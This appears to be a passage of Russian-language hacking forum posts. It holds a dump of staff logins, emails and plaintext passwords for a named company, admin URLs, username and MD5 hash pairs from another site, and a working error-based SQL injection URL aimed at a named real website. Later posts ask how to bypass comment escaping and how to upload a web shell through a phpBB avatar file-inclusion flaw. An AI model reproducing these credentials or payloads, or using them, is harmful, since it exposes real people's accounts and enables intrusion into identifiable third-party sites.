держи PHP: login email pwd aav vml@kitcom.ru tirthadas admin glebov@kitcom.ru flvby1 bea support@kitcom.ru cosys976 biv ivan flvby2_ glbuh kvi@kitcom.ru flvby2_3 gvv svg@kitcom.ru flvby3_3 ivan biv@kitcom.ru flvby_3 ivan@kitco kvp1@kitcom.ru flvby42_ kel mobil@kitcom.ru fsota2_ KNN glbuh@kitcom.ru lvvy42_ kvi ivan@kitcom.ru flvby2_ kvp1 sna@kitcom.ru job04 KVV nshr nshr1_ Ljcneg support@kitcom.ru Pfrfhsn news sps@kitcom.ru yjDsq2_ nshr kel@kitcom.ru TotKjby_ sna gsa@kitcom.ru news_ sps bea@kitcom.ru job1104 svg tea@kitcom.ru dynax19xxx tea knn@kitcom.ru KNN vml kv@kitcom.ru KVV
http://www.karat-telecom.ru/Album/login.php http://www.karat-telecom.ru/Album/admin.php - У Вас нет прав для просмотра этой страницы.
Думаю ты искал это =) Code: username password azrael 50ec504080ee3b965271235bf7789946 fies 5452eea2e1ff9cefa25f5fb590386dfb muster 96f570c3c87558604e79f35637b4663c test 098f6bcd4621d373cade4e832627b4f6
http://www.markus-schmitz.info/CoMaSys/index.php?SID=owbmptuuq&action=cms&id=5+and+%28select+1+from+%28select+count%280%29,concat%28%28select+table_name+from+information_schema.tables+limit+0,1%29,floor%28rand%280%29*2%29%29+from+information_schema.tables+group+by+2%29a%29-- дальше сам крути...
На сайте в комментах знаки Code: < > преобразуются в Code: < > и выводятся обычным текстом. Это можно как-нибудь обойти?
Где сохраняются аватары в phpBB? Есть ЛФИ и полный путь к сайту, пробую подгрузить в аватаре в метаданных пхп код, но выводится она похоже через скрипт, неужели прямо в бд сохраняются аватары? Если так, то как еще можно загрузить шелл? Спасибо
Возможно ли проведение sql-инъекции? $query = 'SELECT nickname FROM users WHERE username ="' . htmlentities($_GET["username"],ENT_QUOTES, 'UTF-8') . '"'; Спасибо